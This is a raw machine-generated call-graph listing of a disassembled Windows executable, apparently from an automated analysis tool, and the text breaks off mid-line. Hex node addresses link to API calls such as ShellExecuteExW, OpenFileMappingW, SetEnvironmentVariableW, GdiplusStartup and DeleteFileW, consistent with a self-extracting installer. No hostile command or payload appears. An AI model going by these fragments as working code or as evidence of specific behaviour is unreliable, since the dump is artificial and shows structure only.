fd8d9 ShellExecuteExW 24475->24467 24482 fd8ec 24475->24482 24477 fd8d1 24477->24475 24478 fd925 24517 fdc3b 6 API calls 24478->24517 24479 fd97b CloseHandle 24480 fd989 24479->24480 24481 fd994 24479->24481 24518 f1fbb CompareStringW 24480->24518 24481->24470 24482->24478 24482->24479 24484 fd91b ShowWindow 24482->24484 24484->24478 24486 fd93d 24486->24479 24487 fd950 GetExitCodeProcess 24486->24487 24487->24479 24488 fd963 24487->24488 24488->24479 24491 fb31e 24490->24491 24492 fb40d 24491->24492 24493 fb3f0 ExpandEnvironmentStringsW 24491->24493 24492->24454 24493->24492 24494->24454 24495->24464 24496->24454 24497->24454 24498->24454 24500 108e54 24499->24500 24501 108e61 24500->24501 24502 108e6c 24500->24502 24503 108e06 __vswprintf_c_l 21 API calls 24501->24503 24504 108e74 24502->24504 24511 108e7d _unexpected 24502->24511 24505 108e69 24503->24505 24506 108dcc _free 20 API calls 24504->24506 24505->24454 24506->24505 24507 108e82 24527 1091a8 20 API calls __dosmaperr 24507->24527 24508 108ea7 RtlReAllocateHeap 24508->24505 24508->24511 24511->24507 24511->24508 24528 107a5e 7 API calls 2 library calls 24511->24528 24519 ea243 24512->24519 24515->24469 24516 eb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24516->24477 24517->24486 24518->24481 24520 fec50 24519->24520 24521 ea250 GetFileAttributesW 24520->24521 24522 ea23a 24521->24522 24523 ea261 24521->24523 24522->24475 24522->24516 24524 ebb03 GetCurrentDirectoryW 24523->24524 24525 ea275 24524->24525 24525->24522 24526 ea279 GetFileAttributesW 24525->24526 24526->24522 24527->24505 24528->24511 25490 fe455 14 API calls ___delayLoadHelper2@8 25491 fc793 107 API calls 4 library calls 25455 e9f7a 25456 e9f8f 25455->25456 25457 e9f88 25455->25457 25458 e9f9c GetStdHandle 25456->25458 25462 e9fab 25456->25462 25458->25462 25459 ea003 WriteFile 25459->25462 25460 e9fcf 25461 e9fd4 WriteFile 25460->25461 25460->25462 25461->25460 25461->25462 25462->25457 25462->25459 25462->25460 25462->25461 25464 ea095 25462->25464 25466 e6baa 78 API calls 25462->25466 25467 e6e98 77 API calls 25464->25467 25466->25462 25467->25457 25543 108268 55 API calls _free 25469 e9a74 25472 e9a7e 25469->25472 25470 e9b9d SetFilePointer 25471 e9bb6 GetLastError 25470->25471 25475 e9ab1 25470->25475 25471->25475 25472->25470 25473 e981a 79 API calls 25472->25473 25474 e9b79 25472->25474 25472->25475 25473->25474 25474->25470 25493 e1075 84 API calls 25561 e1f72 128 API calls __EH_prolog 25562 107f6e 52 API calls 3 library calls 25494 fa070 10 API calls 25544 fb270 99 API calls 25525 fb18d 78 API calls 25496 fc793 97 API calls 4 library calls 25545 fc793 102 API calls 4 library calls 25498 10b49d 6 API calls _ValidateLocalCookies 25526 f9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25566 e6faa 111 API calls 3 library calls 25529 feda7 48 API calls _unexpected 25500 fdca1 DialogBoxParamW 25567 ff3a0 27 API calls 25503 10a4a0 71 API calls _free 25504 1108a0 IsProcessorFeaturePresent 25568 f1bbd GetCPInfo IsDBCSLeadByte 23689 ff3b2 23690 ff3be __FrameHandler3::FrameUnwindToState 23689->23690 23721 feed7 23690->23721 23692 ff3c5 23693 ff518 23692->23693 23696 ff3ef 23692->23696 23794 ff838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23693->23794 23695 ff51f 23787 107f58 23695->23787 23708 ff42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23696->23708 23732 108aed 23696->23732 23703 ff40e 23705 ff48f 23740 ff953 GetStartupInfoW _abort 23705->23740 23707 ff495 23741 108a3e 51 API calls 23707->23741 23708->23705 23790 107af4 38 API calls 2 library calls 23708->23790 23711 ff49d 23742 fdf1e 23711->23742 23715 ff4b1 23715->23695 23716 ff4b5 23715->23716 23717 ff4be 23716->23717 23792 107efb 28 API calls _abort 23716->23792 23793 ff048 12 API calls ___scrt_uninitialize_crt 23717->23793 23720 ff4c6 23720->23703 23722 feee0 23721->23722 23796 ff654 IsProcessorFeaturePresent 23722->23796 23724 feeec 23797 102a5e 23724->23797 23726 feef1 23731 feef5 23726->23731 23805 108977 23726->23805 23729 fef0c 23729->23692 23731->23692 23734 108b04 23732->23734 23733 ffbbc _ValidateLocalCookies 5 API calls 23735 ff408 23733->23735 23734->23733 23735->23703 23736 108a91 23735->23736 23737 108ac0 23736->23737 23738 ffbbc _ValidateLocalCookies 5 API calls 23737->23738 23739 108ae9 23738->23739 23739->23708 23740->23707 23741->23711 23905 f0863 23742->23905 23746 fdf3d 23954 fac16 23746->23954 23748 fdf46 _abort 23749 fdf59 GetCommandLineW 23748->23749 23750 fdf68 23749->23750 23751 fdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23749->23751 23958 fc5c4 23750->23958 23969 e4092 23751->23969 23757 fdf76 OpenFileMappingW 23760 fdf8f MapViewOfFile 23757->23760 23761 fdfd6 CloseHandle 23757->23761 23758 fdfe0 23963 fdbde 23758->23963 23764 fdfcd UnmapViewOfFile 23760->23764 23766 fdfa0 __InternalCxxFrameHandler 23760->23766 23761->23751 23764->23761 23769 fdbde 2 API calls 23766->23769 23771 fdfbc 23769->23771 23770 f90b7 8 API calls 23772 fe0aa DialogBoxParamW 23770->23772 23771->23764 23773 fe0e4 23772->23773 23774 fe0fd 23773->23774 23775 fe0f6 Sleep 23773->23775 23777 fe10b 23774->23777 24002 fae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23774->24002 23775->23774 23778 fe12a DeleteObject 23777->23778 23779 fe13f DeleteObject 23778->23779 23780 fe146 23778->23780 23779->23780 23781 fe189 23780->23781 23782 fe177 23780->23782 23999 fac7c 23781->23999 24003 fdc3b 6 API calls 23782->24003 23784 fe17d CloseHandle 23784->23781 23786 fe1c3 23791 ff993 GetModuleHandleW 23786->23791 24280 107cd5 23787->24280 23790->23705 23791->23715 23792->23717 23793->23720 23794->23695 23796->23724 23809 103b07 23797->23809 23800 102a67 23800->23726 23802 102a6f 23803 102a7a 23802->23803 23823 103b43 DeleteCriticalSection 23802->23823 23803->23726 23852 10c05a 23805->23852 23808 102a7d 7 API calls 2 library calls 23808->23731 23810 103b10 23809->23810 23812 103b39 23810->23812 23813 102a63 23810->23813 23824 103d46 23810->23824 23829 103b43 DeleteCriticalSection 23812->23829 23813->23800 23815 102b8c 23813->23815 23845 103c57 23815->23845 23818 102ba1 23818->23802 23820 102baf 23821 102bbc 23820->23821 23851 102bbf 6 API calls ___vcrt_FlsFree 23820->23851 23821->23802 23823->23800 23830 103c0d 23824->23830 23827 103d7e InitializeCriticalSectionAndSpinCount 23828 103d69 23827->23828 23828->23810 23829->23813 23831 103c4f 23830->23831 23832 103c26 23830->23832 23831->23827 23831->23828 23832->23831 23837 103b72 23832->23837 23835 103c3b GetProcAddress 23835->23831 23836 103c49 23835->23836 23836->23831 23842 103b7e ___vcrt_FlsFree 23837->23842 23838 103bf3 23838->23831 23838->23835 23839 103b95 LoadLibraryExW 23840 103bb3 GetLastError 23839->23840 23841 103bfa 23839->23841 23840->23842 23841->23838 23843 103c02 FreeLibrary 23841->23843 23842->23838 23842->23839 23844 103bd5 LoadLibraryExW 23842->23844 23843->23838 23844->23841 23844->23842 23846 103c0d ___vcrt_FlsFree 5 API calls 23845->23846 23847 103c71 23846->23847 23848 103c8a TlsAlloc 23847->23848 23849 102b96 23847->23849 23849->23818 23850 103d08 6 API calls ___vcrt_FlsFree 23849->23850 23850->23820 23851->23818 23855 10c077 23852->23855 23856 10c073 23852->23856 23853 ffbbc _ValidateLocalCookies 5 API calls 23854 feefe 23853->23854 23854->23729 23854->23808 23855->23856 23858 10a6a0 23855->23858 23856->23853 23859 10a6ac __FrameHandler3::FrameUnwindToState 23858->23859 23870 10ac31 EnterCriticalSection 23859->23870 23861 10a6b3 23871 10c528 23861->23871 23863 10a6c2 23869 10a6d1 23863->23869 23884 10a529 29 API calls 23863->23884 23866 10a6e2 _abort 23866->23855 23867 10a6cc 23885 10a5df GetStdHandle GetFileType 23867->23885 23886 10a6ed LeaveCriticalSection _abort 23869->23886 23870->23861 23872 10c534 __FrameHandler3::FrameUnwindToState 23871->23872 23873 10c541 23872->23873 23874 10c558 23872->23874 23895 1091a8 20 API calls __dosmaperr 23873->23895 23887 10ac31 EnterCriticalSection 23874->23887 23877 10c564 23883 10c590 23877->23883 23888 10c479 23877->23888 23878 10c546 23896 109087 26 API calls __cftof 23878->23896 23881 10c550 _abort 23881->23863 23897 10c5b7 LeaveCriticalSection _abort 23883->23897 23884->23867 23885->23869 23886->23866 23887->23877 23889 10b136 _unexpected 20 API calls 23888->23889 23891 10c48b 23889->23891 23890 10c498 23892 108dcc _free 20 API calls 23890->23892 23891->23890 23898 10af0a 23891->23898 23894 10c4ea 23892->23894 23894->23877 23895->23878 23896->23881 23897->23881 23899 10ac98 _unexpected 5 API calls 23898->23899 23900 10af31 23899->23900 23901 10af4f InitializeCriticalSectionAndSpinCount 23900->23901 23902 10af3a 23900->23902 23901->23902 23903 ffbbc _ValidateLocalCookies 5 API calls 23902->23903 23904 10af66 23903->23904 23904->23891 24004 fec50 23905->24004 23908 f0888 GetProcAddress 23911 f08b9 GetProcAddress 23908->23911 23912 f08a1 23908->23912 23909 f08e7 23910 f0c14 GetModuleFileNameW 23909->23910 24015 1075fb 42 API calls 2 library calls 23909->24015 23921 f0c32 23910->23921 23914 f08cb 23911->23914 23912->23911 23914->23909 23915 f0b54 23915->23910 23916 f0b5f GetModuleFileNameW CreateFileW 23915->23916 23917 f0b8f SetFilePointer 23916->23917 23918 f0c08 CloseHandle 23916->23918 23917->23918 23919 f0b9d ReadFile 23917->23919 23918->23910 23919->23918 23922 f0bbb 23919->23922 23924 f0c94 GetFileAttributesW 23921->23924 23925 f0cac 23921->23925 23927 f0c5d CompareStringW 23921->23927 24006 eb146 23921->24006 24009 f081b 23921->24009 23922->23918 23926 f081b 2 API calls 23922->23926 23924->23921 23924->23925 23928 f0cb7 23925->23928 23931 f0cec 23925->23931 23926->23922 23927->23921 23930 f0cd0 GetFileAttributesW 23928->23930 23933 f0ce8 23928->23933 23929 f0dfb 23953 fa64d GetCurrentDirectoryW 23929->23953 23930->23928 23930->23933 23931->23929 23932 eb146 GetVersionExW 23931->23932 23934 f0d06 23932->23934 23933->23931 23935 f0d0d 23934->23935 23936 f0d73 23934->23936 23938 f081b 2 API calls 23935->23938 23937 e4092 _swprintf 51 API calls 23936->23937 23939 f0d9b AllocConsole 23937->23939 23940 f0d17 23938->23940 23941 f0da8 GetCurrentProcessId AttachConsole 23939->23941 23942 f0df3 ExitProcess 23939->23942 23943 f081b 2 API calls 23940->23943 24020 103e13 23941->24020 23945 f0d21 23943->23945 24016 ee617 23945->24016 23946 f0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23946->23942 23949 e4092 _swprintf 51 API calls 23950 f0d4f 23949->23950 23951 ee617 53 API calls 23950->23951 23952 f0d5e 23951->23952 23952->23942 23953->23746 23955 f081b 2 API calls 23954->23955 23956 fac2a OleInitialize 23955->23956 23957 fac4d GdiplusStartup SHGetMalloc 23956->23957 23957->23748 23961 fc5ce 23958->23961 23959 fc6e4 23959->23757 23959->23758 23960 f1fac CharUpperW 23960->23961 23961->23959 23961->23960 24045 ef3fa 23961->24045 23964 fec50 23963->23964 23965 fdbeb SetEnvironmentVariableW 23964->23965 23967 fdc0e 23965->23967 23966 fdc36 23966->23751 23967->23966 23968 fdc2a SetEnvironmentVariableW 23967->23968 23968->23966 24074 e4065 23969->24074 23972 fb6dd LoadBitmapW 23973 fb6fe 23972->23973 23974 fb70b GetObjectW 23972->23974 24108 fa6c2 FindResourceW 23973->24108 23976 fb71a 23974->23976 24103 fa5c6 23976->24103 23980 fb770 23991 eda42 23980->23991 23981 fb74c 24122 fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23981->24122 23983 fa6c2 12 API calls 23985 fb73d 23983->23985 23984 fb754 24123 fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23984->24123 23985->23981 23987 fb743 DeleteObject 23985->23987 23987->23981 23988 fb75d 24124 fa80c 8 API calls 23988->24124 23990 fb764 DeleteObject 23990->23980 24135 eda67 23991->24135 23996 f90b7 24268 feb38 23996->24268 24000 facab GdiplusShutdown OleUninitialize 23999->24000 24000->23786 24002->23777 24003->23784 24005 f086d GetModuleHandleW 24004->24005 24005->23908 24005->23909 24007 eb15a GetVersionExW 24006->24007 24008 eb196 24006->24008 24007->24008 24008->23921 24010 fec50 24009->24010 24011 f0828 GetSystemDirectoryW 24010->24011 24012 f085e 24011->24012 24013 f0840 24011->24013 24012->23921 24014 f0851 LoadLibraryW 24013->24014 24014->24012 24015->23915 24017 ee627 24016->24017 24022 ee648 24017->24022 24021 103e1b 24020->24021 24021->23946 24021->24021 24028 ed9b0 24022->24028 24025 ee66b LoadStringW 24026 ee645 24025->24026 24027 ee682 LoadStringW 24025->24027 24026->23949 24027->24026 24033 ed8ec 24028->24033 24030 ed9cd 24031 ed9e2 24030->24031 24041 ed9f0 26 API calls 24030->24041 24031->24025 24031->24026 24034 ed904 24033->24034 24040 ed984 _strncpy 24033->24040 24036 ed928 24034->24036 24042 f1da7 WideCharToMultiByte 24034->24042 24039 ed959 24036->24039 24043 ee5b1 50 API calls __vsnprintf 24036->24043 24044 106159 26 API calls 3 library calls 24039->24044 24040->24030 24041->24031 24042->24036 24043->24039 24044->24040 24046 ef409 _abort 24045->24046 24047 ef420 _wcslen 24045->24047 24046->23961 24049 ef303 24047->24049 24050 ef314 __InternalCxxFrameHandler 24049->24050 24053 ef344 24050->24053 24054 ef35c 24053->24054 24055 ef352 24053->24055 24057 ef376 24054->24057 24058 ef3d1 GetCurrentProcessId 24054->24058 24065 ef2c5 24055->24065 24059 ef33e 24057->24059 24071 e6c36 76 API calls __vswprintf_c_l 24057->24071 24058->24059 24059->24046 24061 ef399 24072 e6dcb 76 API calls 24061->24072 24063 ef3a2 24073 e6c31 RaiseException _com_raise_error 24063->24073 24066 ef2ce 24065->24066 24067 ef2fd 24065->24067 24068 f081b 2 API calls 24066->24068 24067->24054 24069 ef2d8 24068->24069 24069->24067 24070 ef2de GetProcAddress GetProcAddress 24069->24070 24070->24067 24071->24061 24072->24063 24073->24059 24075 e407c __vswprintf_c_l 24074->24075 24078 105fd4 24075->24078 24081 104097 24078->24081 24082 1040d7 24081->24082 24083 1040bf 24081->24083 24082->24083 24085 1040df 24082->24085 24098 1091a8 20 API calls __dosmaperr 24083->24098 24086 104636 __cftof 38 API calls 24085->24086 24088 1040ef 24086->24088 24087 1040c4 24099 109087 26 API calls __cftof 24087->24099 24100 104601 20 API calls 2 library calls 24088->24100 24091 ffbbc _ValidateLocalCookies 5 API calls 24093 e4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24091->24093 24092 104167 24101 1049e6 51 API calls 4 library calls 24092->24101 24093->23972 24096 1040cf 24096->24091 24097 104172 24102 1046b9 20 API calls _free 24097->24102 24098->24087 24099->24096 24100->24092 24101->24097 24102->24096 24125 fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24103->24125 24105 fa5cd 24106 fa5d9 24105->24106 24126 fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24105->24126 24106->23980 24106->23981 24106->23983 24109 fa6e5 SizeofResource 24108->24109 24110 fa7d3 24108->24110 24109->24110 24111 fa6fc LoadResource 24109->24111 24110->23974 24110->23976 24111->24110 24112 fa711 LockResource 24111->24112 24112->24110 24113 fa722 GlobalAlloc 24112->24113 24113->24110 24114 fa73d GlobalLock 24113->24114 24115 fa7cc GlobalFree 24114->24115 24116 fa74c __InternalCxxFrameHandler 24114->24116 24115->24110 24117 fa7c5 GlobalUnlock 24116->24117 24127 fa626 GdipAlloc 24116->24127 24117->24115 24120 fa79a GdipCreateHBITMAPFromBitmap 24121 fa7b0 24120->24121 24121->24117 24122->23984 24123->23988 24124->23990 24125->24105 24126->24106 24128 fa638 24127->24128 24130 fa645 24127->24130 24131 fa3b9 24128->24131 24130->24117 24130->24120 24130->24121 24132 fa3da GdipCreateBitmapFromStreamICM 24131->24132 24133 fa3e1 GdipCreateBitmapFromStream 24131->24133 24134 fa3e6 24132->24134 24133->24134 24134->24130 24136 eda75 __EH_prolog 24135->24136 24137 edaa4 GetModuleFileNameW 24136->24137 24138 edad5 24136->24138 24139 edabe 24137->24139 24181 e98e0 24138->24181 24139->24138 24141 edb31 24192 106310 24141->24192 24145 edb44 24147 106310 26 API calls 24145->24147 24146 edb05 24146->24141 24148 ee261 78 API calls 24146->24148 24159 edd4a 24146->24159 24156 edb56 ___vcrt_FlsFree 24147->24156 24148->24146 24149 edc85 24149->24159 24228 e9d70 81 API calls 24149->24228 24153 edc9f ___std_exception_copy 24154 e9bd0 82 API calls 24153->24154 24153->24159 24157 edcc8 ___std_exception_copy 24154->24157 24156->24149 24156->24159 24206 e9e80 24156->24206 24222 e9bd0 24156->24222 24227 e9d70 81 API calls 24156->24227 24157->24159 24176 edcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24157->24176 24229 f1b84 MultiByteToWideChar 24157->24229 24215 e959a 24159->24215 24160 ee159 24164 ee1de 24160->24164 24235 108cce 26 API calls 2 library calls 24160->24235 24162 ee16e 24236 107625 26 API calls 2 library calls 24162->24236 24165 ee214 24164->24165 24169 ee261 78 API calls 24164->24169 24170 106310 26 API calls 24165->24170 24167 ee1c6 24237 ee27c 78 API calls 24167->24237 24169->24164 24171 ee22d 24170->24171 24172 106310 26 API calls 24171->24172 24172->24159 24174 f1da7 WideCharToMultiByte 24174->24176 24176->24159 24176->24160 24176->24174 24230 ee5b1 50 API calls __vsnprintf 24176->24230 24231 106159 26 API calls 3 library calls 24176->24231 24232 108cce 26 API calls 2 library calls 24176->24232 24233 107625 26 API calls 2 library calls 24176->24233 24234 ee27c 78 API calls 24176->24234 24179 ee29e GetModuleHandleW FindResourceW 24180 eda55 24179->24180 24180->23996 24182 e98ea 24181->24182 24183 e994b CreateFileW 24182->24183 24184 e996c GetLastError 24183->24184 24187 e99bb 24183->24187 24238 ebb03 24184->24238 24186 e998c 24186->24187 24189 e9990 CreateFileW GetLastError 24186->24189 24188 e99ff 24187->24188 24190 e99e5 SetFileTime 24187->24190 24188->24146 24189->24187 24191 e99b5 24189->24191 24190->24188 24191->24187 24193 106349 24192->24193 24194 10634d 24193->24194 24205 106375 24193->24205 24242 1091a8 20 API calls __dosmaperr 24194->24242 24196 106352 24243 109087 26 API calls __cftof 24196->24243 24197 106699 24199 ffbbc _ValidateLocalCookies 5 API calls 24197->24199 24201 1066a6 24199->24201 24200 10635d 24202 ffbbc _ValidateLocalCookies 5 API calls 24200->24202 24201->24145 24203 106369 24202->24203 24203->24145 24205->24197 24244 106230 5 API calls _ValidateLocalCookies 24205->24244 24207 e9e92 24206->24207 24209 e9ea5 24206->24209 24208 e9eb0 24207->24208 24245 e6d5b 77 API calls 24207->24245 24208->24156 24209->24208 24211 e9eb8 SetFilePointer 24209->24211 24211->24208 24212 e9ed4 GetLastError 24211->24212 24212->24208 24213 e9ede 24212->24213 24213->24208 24246 e6d5b 77 API calls 24213->24246 24216 e95be 24215->24216 24217 e95cf 24215->24217 24216->24217 24218 e95ca 24216->24218 24219 e95d1 24216->24219 24217->24179 24247 e974e 24218->24247 24252 e9620 24219->24252 24223 e9bdc 24222->24223 24224 e9be3 24222->24224 24223->24156 24224->24223 24226 e9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24224->24226 24267 e6d1a 77 API calls 24224->24267 24226->24224 24227->24156 24228->24153 24229->24176 24230->24176 24231->24176 24232->24176 24233->24176 24234->24176 24235->24162 24236->24167 24237->24164 24239 ebb10 _wcslen 24238->24239 24240 ebbb8 GetCurrentDirectoryW 24239->24240 24241 ebb39 _wcslen 24239->24241 24240->24241 24241->24186 24242->24196 24243->24200 24244->24205 24245->24209 24246->24208 24248 e9757 24247->24248 24249 e9781 24247->24249 24248->24249 24258 ea1e0 24248->24258 24249->24217 24253 e964a 24252->24253 24254 e962c 24252->24254 24255 e9669 24253->24255 24266 e6bd5 76 API calls 24253->24266 24254->24253 24256 e9638 FindCloseChangeNotification 24254->24256 24255->24217 24256->24253 24259 fec50 24258->24259 24260 ea1ed DeleteFileW 24259->24260 24261 e977f 24260->24261 24262 ea200 24260->24262 24261->24217 24263 ebb03 GetCurrentDirectoryW 24262->24263 24264 ea214 24263->24264 24264->24261 24265 ea218 DeleteFileW 24264->24265 24265->24261 24266->24255 24267->24224 24269 feb3d ___std_exception_copy 24268->24269 24270 f90d6 24269->24270 24273 feb59 24269->24273 24277 107a5e 7 API calls 2 library calls 24269->24277 24270->23770 24272 ff5c9 24279 10238d RaiseException 24272->24279 24273->24272 24278 10238d RaiseException 24273->24278 24275 ff5e6 24277->24269 24278->24272 24279->24275 24281 107ce1 _unexpected 24280->24281 24282 107ce8 24281->24282 24283 107cfa 24281->24283 24319 107e2f GetModuleHandleW 24282->24319 24304 10ac31 EnterCriticalSection 24283->24304 24286 107ced 24286->24283 24320 107e73 GetModuleHandleExW 24286->24320 24289 107d76 24294 107d8e 24289->24294 24298 108a91 _abort 5 API calls 24289->24298 24292 107de8 24328 112390 5 API calls _ValidateLocalCookies 24292->24328 24293 107dbc 24311 107dee 24293->24311 24299 108a91 _abort 5 API calls 24294->24299 24298->24294 24302 107d9f 24299->24302 24300 107d01 24300->24289 24300->24302 24305 1087e0 24300->24305 24308 107ddf 24302->24308 24304->24300 24329 108519 24305->24329 24348 10ac81 LeaveCriticalSection 24308->24348 24310 107db8 24310->24292 24310->24293 24349 10b076 24311->24349 24314 107e1c 24316 107e73 _abort 8 API calls 24314->24316 24315 107dfc GetPEB 24315->24314 24317 107e0c GetCurrentProcess TerminateProcess 24315->24317 24318 107e24 ExitProcess 24316->24318 24317->24314 24319->24286 24321 107ec0 24320->24321 24322 107e9d GetProcAddress 24320->24322 24324 107ec6 FreeLibrary 24321->24324 24325 107ecf 24321->24325 24323 107eb2 24322->24323 24323->24321 24324->24325 24326 ffbbc _ValidateLocalCookies 5 API calls 24325->24326 24327 107cf9 24326->24327 24327->24283 24332 1084c8 24329->24332 24331 10853d 24331->24289 24333 1084d4 __FrameHandler3::FrameUnwindToState 24332->24333 24340 10ac31 EnterCriticalSection 24333->24340 24335 1084e2 24341 108569 24335->24341 24339 108500 _abort 24339->24331 24340->24335 24344 108591 24341->24344 24345 108589 24341->24345 24342 ffbbc _ValidateLocalCookies 5 API calls 24343 1084ef 24342->24343 24347 10850d LeaveCriticalSection _abort 24343->24347 24344->24345 24346 108dcc _free 20 API calls 24344->24346 24345->24342 24346->24345 24347->24339 24348->24310 24350 10b09b 24349->24350 24353 10b091 24349->24353 24351 10ac98 _unexpected 5 API calls 24350->24351 24351->24353 24352 ffbbc _ValidateLocalCookies 5 API calls 24354 107df8 24352->24354 24353->24352 24354->24314 24354->24315 24355 fe5b1 24356 fe578 24355->24356 24358 fe85d 24356->24358 24384 fe5bb 24358->24384 24360 fe86d 24361 fe8ee 24360->24361 24362 fe8ca 24360->24362 24365 fe966 LoadLibraryExA 24361->24365 24367 fe9c7 24361->24367 24368 fe9d9 24361->24368 24378 fea95 24361->24378 24363 fe7fb DloadReleaseSectionWriteAccess 6 API calls 24362->24363 24364 fe8d5 RaiseException 24363->24364 24379 feac3 24364->24379 24366 fe979 GetLastError 24365->24366 24365->24367 24370 fe98c 24366->24370 24371 fe9a2 24366->24371 24367->24368 24369 fe9d2 FreeLibrary 24367->24369 24372 fea37 GetProcAddress 24368->24372 24368->24378 24369->24368 24370->24367 24370->24371 24374 fe7fb DloadReleaseSectionWriteAccess 6 API calls 24371->24374 24373 fea47 GetLastError 24372->24373 24372->24378 24376 fea5a 24373->24376 24375 fe9ad RaiseException 24374->24375 24375->24379 24376->24378 24380 fe7fb DloadReleaseSectionWriteAccess 6 API calls 24376->24380 24393 fe7fb 24378->24393 24379->24356 24381 fea7b RaiseException 24380->24381 24382 fe5bb ___delayLoadHelper2@8 6 API calls 24381->24382 24383 fea92 24382->24383 24383->24378 24385 fe5ed 24384->24385 24386 fe5c7 24384->24386 24385->24360 24401 fe664 24386->24401 24388 fe5cc 24389 fe5e8 24388->24389 24404 fe78d 24388->24404 24409 fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24389->24409 24392 fe836 24392->24360 24394 fe82f 24393->24394 24395 fe80d 24393->24395 24394->24379 24396 fe664 DloadReleaseSectionWriteAccess 3 API calls 24395->24396 24397 fe812 24396->24397 24398 fe82a 24397->24398 24399 fe78d DloadProtectSection 3 API calls 24397->24399 24412 fe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24398->24412 24399->24398 24410 fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24401->24410 24403 fe669 24403->24388 24407 fe7a2 DloadProtectSection 24404->24407 24405 fe7a8 24405->24389 24406 fe7dd VirtualProtect 24406->24405 24407->24405 24407->24406 24411 fe6a3 VirtualQuery GetSystemInfo 24407->24411 24409->24392 24410->24403 24411->24406 24412->24394 25531 fb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25569 10a3d0 21 API calls 2 library calls 25570 112bd0 VariantClear 25548 f62ca 123 API calls __InternalCxxFrameHandler 25549 100ada 51 API calls 2 library calls 24422 fdec2 24423 fdecf 24422->24423 24424 ee617 53 API calls 24423->24424 24425 fdedc 24424->24425 24426 e4092 _swprintf 51 API calls 24425->24426 24427 fdef1 SetDlgItemTextW 24426->24427 24430 fb568 PeekMessageW 24427->24430 24431 fb5bc 24430->24431 24432 fb583 GetMessageW 24430->24432 24433 fb599 IsDialogMessageW 24432->24433 24434 fb5a8 TranslateMessage DispatchMessageW 24432->24434 24433->24431 24433->24434 24434->24431 25533 fb5c0 100 API calls 25572 f77c0 118 API calls 25573 fffc0 RaiseException _com_raise_error _com_error::_com_error 24529 fe2d7 24530 fe1db 24529->24530 24531 fe85d ___delayLoadHelper2@8 14 API calls 24530->24531 24531->24530 24533 e10d5 24538 e5abd 24533->24538 24539 e5ac7 __EH_prolog 24538->24539 24545 eb505 24539->24545 24541 e5ad3 24551 e5cac GetCurrentProcess GetProcessAffinityMask 24541->24551 24546 eb50f __EH_prolog 24545->24546 24552 ef1d0 82 API calls 24546->24552 24548 eb521 24553 eb61e 24548->24553 24552->24548 24554 eb630 _abort 24553->24554 24557 f10dc 24554->24557 24560 f109e GetCurrentProcess GetProcessAffinityMask 24557->24560 24561 eb597 24560->24561 24561->24541 25507 ff4d3 20 API calls 24562 fe1d1 14 API calls ___delayLoadHelper2@8 24564 1098f0 24572 10adaf 24564->24572 24568 10990c 24569 109919 24568->24569 24580 109920 11 API calls 24568->24580 24571 109904 24573 10ac98 _unexpected 5 API calls 24572->24573 24574 10add6 24573->24574 24575 10adee TlsAlloc 24574->24575 24576 10addf 24574->24576 24575->24576 24577 ffbbc _ValidateLocalCookies 5 API calls 24576->24577 24578 1098fa 24577->24578 24578->24571 24579 109869 20 API calls 2 library calls 24578->24579 24579->24568 24580->24571 24581 10abf0 24582 10abfb 24581->24582 24583 10af0a 11 API calls 24582->24583 24584 10ac24 24582->24584 24585 10ac20 24582->24585 24583->24582 24587 10ac50 DeleteCriticalSection 24584->24587 24587->24585 25508 1088f0 7 API calls ___scrt_uninitialize_crt 24594 ef1e8 24595 ef1f8 24594->24595 24596 ef1f0 FreeLibrary 24594->24596 24596->24595 24597 feae7 24598 feaf1 24597->24598 24599 fe85d ___delayLoadHelper2@8 14 API calls 24598->24599 24600 feafe 24599->24600 25509 ff4e7 29 API calls _abort 25510 102cfb 38 API calls 4 library calls 24602 fb7e0 24603 fb7ea __EH_prolog 24602->24603 24770 e1316 24603->24770 24606 fbf0f 24835 fd69e 24606->24835 24607 fb82a 24609 fb89b 24607->24609 24610 fb838 24607->24610 24682 fb841 24607->24682 24612 fb92e GetDlgItemTextW 24609->24612 24617 fb8b1 24609->24617 24613 fb83c 24610->24613 24614 fb878 24610->24614 24612->24614 24620 fb96b 24612->24620 24624 ee617 53 API calls 24613->24624 24613->24682 24621 fb95f KiUserCallbackDispatcher 24614->24621 24614->24682 24615 fbf2a SendMessageW 24616 fbf38 24615->24616 24618 fbf52 GetDlgItem SendMessageW 24616->24618 24619 fbf41 SendDlgItemMessageW 24616->24619 24623 ee617 53 API calls 24617->24623 24853 fa64d GetCurrentDirectoryW 24618->24853 24619->24618 24622 fb980 GetDlgItem 24620->24622 24768 fb974 24620->24768 24621->24682 24626 fb9b7 SetFocus 24622->24626 24627 fb994 SendMessageW SendMessageW 24622->24627 24628 fb8ce SetDlgItemTextW 24623->24628 24629 fb85b 24624->24629 24631 fb9c7 24626->24631 24647 fb9e0 24626->24647 24627->24626 24632 fb8d9 24628->24632 24875 e124f SHGetMalloc 24629->24875 24630 fbf82 GetDlgItem 24634 fbf9f 24630->24634 24635 fbfa5 SetWindowTextW 24630->24635 24637 ee617 53 API calls 24631->24637 24640 fb8e6 GetMessageW 24632->24640 24632->24682 24634->24635 24854 fabab GetClassNameW 24635->24854 24641 fb9d1 24637->24641 24638 fbe55 24642 ee617 53 API calls 24638->24642 24645 fb8fd IsDialogMessageW 24640->24645 24640->24682 24876 fd4d4 24641->24876 24643 fbe65 SetDlgItemTextW 24642->24643 24649 fbe79 24643->24649 24645->24632 24651 fb90c TranslateMessage DispatchMessageW 24645->24651 24652 ee617 53 API calls 24647->24652 24648 fc1fc SetDlgItemTextW 24648->24682 24654 ee617 53 API calls 24649->24654 24651->24632 24653 fba17 24652->24653 24656 